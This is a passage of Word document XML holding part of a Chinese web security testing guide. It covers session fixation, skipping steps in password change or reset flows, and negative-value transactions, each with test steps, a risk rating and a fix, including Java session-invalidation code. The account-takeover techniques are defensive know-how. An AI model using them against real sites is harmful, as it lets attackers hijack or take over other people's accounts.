        <w:t>，即可进入</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Alice</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的账户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C49753"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2631EA" w14:textId="77777777" w:rsidR="00956C0B" w:rsidRPr="00BC7510" w:rsidRDefault="00956C0B" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开网站登录页面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EE09CB" w14:textId="6EEA9570" w:rsidR="00CC31EF" w:rsidRPr="00BC7510" w:rsidRDefault="00956C0B" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登陆前通过软件工具抓取到的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息值与在登录后抓取到的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行对比，如果其值一样，则可判断其会话的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sessions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未进行更新。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC8F7FF" w14:textId="29B5C707" w:rsidR="00CC31EF" w:rsidRPr="00BC7510" w:rsidRDefault="00C24790" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00CC31EF" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00F06DD8" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会窃取或操纵客户会话和</w:t>
      </w:r>
      <w:r w:rsidR="00F06DD8" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00F06DD8" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用于模仿合法用户，从而以该用户身份查看或变更用户记录以及执行事务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DEAB1C"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045710DD" w14:textId="54F8749A" w:rsidR="00CC31EF" w:rsidRPr="00BC7510" w:rsidRDefault="001E1707" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：会话可由攻击者建立后发给受害者使用该会话登录系统，然后攻击者利用该会话即可登录受害者账户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CCB0F5" w14:textId="06C2DB75" w:rsidR="005A5491" w:rsidRPr="00BC7510" w:rsidRDefault="00CC31EF" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00F46F27" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在用户提供的认证信息（例如用户名和密码）、相应的权限级别发生变化时，服务器端应重新生成</w:t>
      </w:r>
      <w:r w:rsidR="00F46F27" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SessionID</w:t>
      </w:r>
      <w:r w:rsidR="00F46F27" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并强制失效之前的会话</w:t>
      </w:r>
      <w:r w:rsidR="005A5491" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00A849D0" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00F46F27" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例代码如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8494"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F46F27" w:rsidRPr="00BC7510" w14:paraId="60F0A39C" w14:textId="77777777" w:rsidTr="00DB4B36">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3595BE" w14:textId="77777777" w:rsidR="00F46F27" w:rsidRPr="00BC7510" w:rsidRDefault="00F46F27" w:rsidP="00BC7510">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC7510">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>request.getSession().invalidate();//</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7510">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>清空</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7510">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">session </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66BE5B22" w14:textId="77777777" w:rsidR="00F46F27" w:rsidRPr="00BC7510" w:rsidRDefault="00F46F27" w:rsidP="00BC7510">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC7510">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Cookie cookie = request.getCookies()[0];//</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7510">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7510">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">cookie </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E976454" w14:textId="39062E7A" w:rsidR="00F46F27" w:rsidRPr="00BC7510" w:rsidRDefault="00F46F27" w:rsidP="00BC7510">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC7510">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cookie.setMaxAge(0);//</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7510">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>让</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7510">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>coo</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4B36">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>k</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7510">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ie</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7510">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>过期</w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7510">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BC7510">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CA51878" w14:textId="3939315B" w:rsidR="00D71AB4" w:rsidRDefault="005A5491" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：这段代码需要在页面的最后部分加上才可以，否则将报错</w:t>
      </w:r>
      <w:r w:rsidR="00F46F27" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5CABD1" w14:textId="4688654D" w:rsidR="00AC33EB" w:rsidRPr="00BC7510" w:rsidRDefault="00AC33EB" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简"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64FD57CC" w14:textId="165BED52" w:rsidR="00CC31EF" w:rsidRPr="00AD537C" w:rsidRDefault="00082061" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc498434504"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>业务逻辑篡改</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="3D4A5F2B" w14:textId="4FB0CD9F" w:rsidR="00CC31EF" w:rsidRPr="00A82BA3" w:rsidRDefault="00082061" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc498434505"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82BA3">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重置流程跨越</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="34C20DF3" w14:textId="3F3A4D8A"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00E919E6" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码修改功能常采用分步骤方式来实现，攻击者在未知原始密码的情况下绕过某些检验步骤修改用户密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139DE751"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBFBF35" w14:textId="16958345" w:rsidR="00CC31EF" w:rsidRPr="00BC7510" w:rsidRDefault="00517399" w:rsidP="00BC7510">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成修改／重置密码的正常流程；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332110FD" w14:textId="48CEAF53" w:rsidR="00517399" w:rsidRPr="00BC7510" w:rsidRDefault="00517399" w:rsidP="00BC7510">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过检验原密码</w:t>
      </w:r>
      <w:r w:rsidR="008C7DEA" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>步骤，直接</w:t>
      </w:r>
      <w:r w:rsidR="00890109" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问输入新密码页面，输入新密码，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改／重置密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFD722E" w14:textId="65CFC292" w:rsidR="00CC31EF" w:rsidRPr="00BC7510" w:rsidRDefault="00C24790" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00CC31EF" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00B26DB1" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有些密码修改／重置流程采用</w:t>
      </w:r>
      <w:r w:rsidR="00B26DB1" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>step</w:t>
      </w:r>
      <w:r w:rsidR="00B26DB1" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>=1</w:t>
      </w:r>
      <w:r w:rsidR="00B26DB1" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00B26DB1" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>step=2</w:t>
      </w:r>
      <w:r w:rsidR="00B26DB1" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似的方式实现，如果应用校验不全面，攻击者可绕过前面的步骤，直接访问最后一步，输入新密码进行修改／重置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1235E3"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AA23F2" w14:textId="0A7D3C51" w:rsidR="00CC31EF" w:rsidRPr="00BC7510" w:rsidRDefault="001D5319" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：绕过原密码验证或绕过验证码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68025A2D" w14:textId="4F8FE40E" w:rsidR="00CC31EF" w:rsidRDefault="00CC31EF" w:rsidP="00BC7510">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="003A7365" w:rsidRPr="00BC7510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一次性填写校验信息（原始密码、新密码等）后再提交修改／重置密码请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A323DE" w14:textId="30679693" w:rsidR="00AC33EB" w:rsidRPr="00BC7510" w:rsidRDefault="00AC33EB" w:rsidP="00BC7510">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5B4A36ED" w14:textId="1F6B0888" w:rsidR="008C28BD" w:rsidRPr="00A82BA3" w:rsidRDefault="006F6F7B" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc498434506"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>负值反冲</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="6B87AE49" w14:textId="5F95D77E"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00DF5895" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序未校验订单数据的取值范围，交易存在负值反冲。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB1D65D" w14:textId="30353DF9"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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="001C68CE" w:rsidRPr="009269F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
